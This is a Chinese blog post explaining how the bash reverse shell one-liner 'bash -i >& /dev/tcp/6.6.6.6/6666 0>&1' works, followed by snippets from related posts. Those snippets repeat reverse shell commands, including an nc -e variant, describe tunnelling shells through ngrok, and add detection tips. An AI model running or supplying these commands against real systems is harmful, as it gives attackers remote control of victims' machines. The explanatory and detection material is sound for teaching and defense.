快速看懂linux反弹shell原理

最新推荐文章于 2024-07-12 16:34:36 发布
最新推荐文章于 2024-07-12 16:34:36 发布
阅读量281 收藏
点赞数 6
文章标签: linux 服务器 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43658820/article/details/139543777
版权

反弹shell命令:

bash -i >& /dev/tcp/6.6.6.6/6666 0>&1

其中6.6.6.6是ip地址,6666是端口

这句代码的意思是:

-i: i就是interactive,bash -i就是创建一个交互式的shell

bash -i >& /dev/tcp/6.6.6.6/6666 将文件描述符的1,2(标准输出和标准错误)重定向到tcp连接的一台主机上。

0>&1 : 再把标注输入0 重定向到标准输出1,也就是tcp连接的那台主机(因为1  之前就被重定向了)。

playmaker90
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux利用java反弹shell_linux反弹shell命令解析
weixin_35662493的博客
02-26 558
今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell1. 什么是反弹shell简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。2. 反弹shell的用途这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙3. 反...
内网kali 通过ngrok穿透反弹shell
失心少年
08-05 7731
1、在ngrok注册账号,并且开通免费隧道(网址:https://www.ngrok.cc) 这里我kali的内网ip地址是10.10.10.131 2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html) 解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件 3...
反弹shell汇总(超详细)
qq_52173020的博客
05-27 6945
反弹shell姿势大全
Ngrok反弹shell
凝聚力安全团队
08-31 508
ngrok创建隧道 ngrok地址:http://ngrok.cc/ 创建隧道 登录后,点击隧道管理->开通隧道 底部是有免费的,不过是美国的,使用起来会有点微卡。大家也可以买国内的,便宜的也是10块钱而已。 选择好服务器,填写相应的选项: 1.选择tcp协议 2.填写隧道名称 3.远程端口(你购买的远程服务器会提供一个远程端口给你,供你转发反弹)。 4.本地端口(你本机接收shell的端口) 确认开通: 在隧道管理就可以看到一条自己新建立的隧道 ...
内网渗透之ngrok隧道
shy的博客
09-24 3141
场景:拿到了一个shell,管理员权限,windows系统,手动开启了3389端口,nmap扫描3389端口为filter,怀疑是防火墙拦截了,经过与度娘多次深入浅出的交流,决定使用ngrock隧道,将该服务器3389端口映射到公网上,然后进行远程登陆。 1,访问ngrok官网http://www.ngrok.cc/注册账号 2,购买这个美国的,免费的,特别容易出问题的免费隧道 3,开通隧道 http/https协议需要有自己的域名,名称随便写,远程端口也随便写,能用就行 最关键的是本地端口.
端口映射后的公网反弹shell
来到了学渣的博客
04-01 3051
前言: 渗透一个网站最后获取该web服务器权限的时候,可能会思考,如何把公网的IP反弹到自己内网(私有ip)的虚拟机上?这时候我们就需要把内网的ip和端口映射成一个公网的ip和端口从而实现内网穿透。 这里我用的是NATAPP,一个基于ngrok的国内高速内网转发工具 https://natapp.cn/register 首先快速注册,然后购买免费隧道(非常适合我这样的穷学生) 我这里用的是TC...
linux反弹shell命令解析
原味瓜子、的博客
09-29 2222
文章目录1. 什么是反弹shell2. 反弹shell的用途3. 反弹shell操作步骤4. 原理 1. 什么是反弹shell 简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。 2. 反弹shell的用途 这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙 3. 反弹shell操作步骤 3.1. 在本机开启端口9090 nc -lk 9090 3.2. 在需要被控制的机器上执行如下两种命令中的一种即可 bash -i >& /
linux反弹shell原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
linuxshell的工作原理
08-30
"linuxshell的工作原理" Linux操作系统中的shell是用户和系统之间的接口,提供了命令语言、命令解释程序及程序设计语言的统称。shell是一个命令语言解释器,拥有自己内建的shell命令集,shell也能被系统中其他...
通过ngrok在内网捕获meterpreter反弹
hambaga的博客
09-13 1585
一、准备工作 在学习msf的过程中,一般都是搭建虚拟机,在局域网里进行练习的。在实际渗透中,目标机器与我们的主机可能并不在同一个网络内,甚至会有双方都处在内网中的情况。那么,如何让处在内网中的目标机器把 meterpreter shell 反弹到同样在内网中的主机呢? 首先需要一台有公网ip的服务器,用作中转。然后在服务器上部署ngrok服务,并生成linux平台的客户端程序。我选择的是自己搭...
Linux】进程间通信——匿名管道
2201_76024104的博客
07-08 1140
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
Linux C | 管道open打开方式
最新发布
I_feige的博客
07-12 205
1.
建立共享linux第三方软件仓库
Znj1421304181的博客
07-08 208
【代码】建立共享linux第三方软件仓库。
Linux系列2】Cmake安装记录
kewaqi618的博客
07-08 1032
主要介绍Cmake的安装方法,及自己安装的过程
Linux 安装 Docker Compose
m0_63004677的博客
07-12 186
Linux 系统安装 Docker Compose
保姆级教程:Linux (Ubuntu) 部署流光卡片开源 API
梦染 * 星尘 的博客
07-09 828
流光卡片 API 开源地址 Github:https://github.com/ygh3279799773/streamer-card流光卡片 API 开源地址 Gitee:https://gitee.com/y-gh/streamer-card流光卡片在线使用地址:https://fireflycard.shushiai.com/想要使用 api 调用服务,需要有一个服务器来时刻监听请求。服务器终端界面阅读不方便,因此需要使用宝塔面板进行管理。
linux反弹shell检测
08-22
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如 tcpdump 或 Wireshark,检查网络流量是否存在异常连接或未知的传出连接。特别关注与反弹 shell 相关的常见端口(如 4444、31337)。 2. 检查系统进程:使用 ps 或 top 命令检查正在运行的进程列表,查找不明确的、不信任的或异常的进程。特别关注与反弹 shell 相关的常见进程名称(如 netcat、nc、socat)。 3. 检查系统文件:使用查找命令(如 find)或相关工具,检查系统文件是否存在未知的、可疑的或异常的文件。特别关注与反弹 shell 相关的常见文件名和路径(如 .bashrc、.bash_profile、.ssh/authorized_keys)。 4. 检查系统日志:查看系统日志文件,如 /var/log/auth.log 或 /var/log/secure,检查是否存在异常登录尝试或认证失败记录,以及与反弹 shell 相关的异常日志。 5. 使用专业工具:使用专门的安全工具,如 LOKI、Lynis、AIDE 等,来扫描系统并检测可能的反弹 shell 活动。这些工具可以自动化检测系统中的恶意活动和异常行为。 请注意,这些方法可以帮助您发现潜在的反弹 shell 活动,但不能保证绝对的安全。建议您定期更新系统、安装最新的安全补丁,并采取其他安全措施来确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值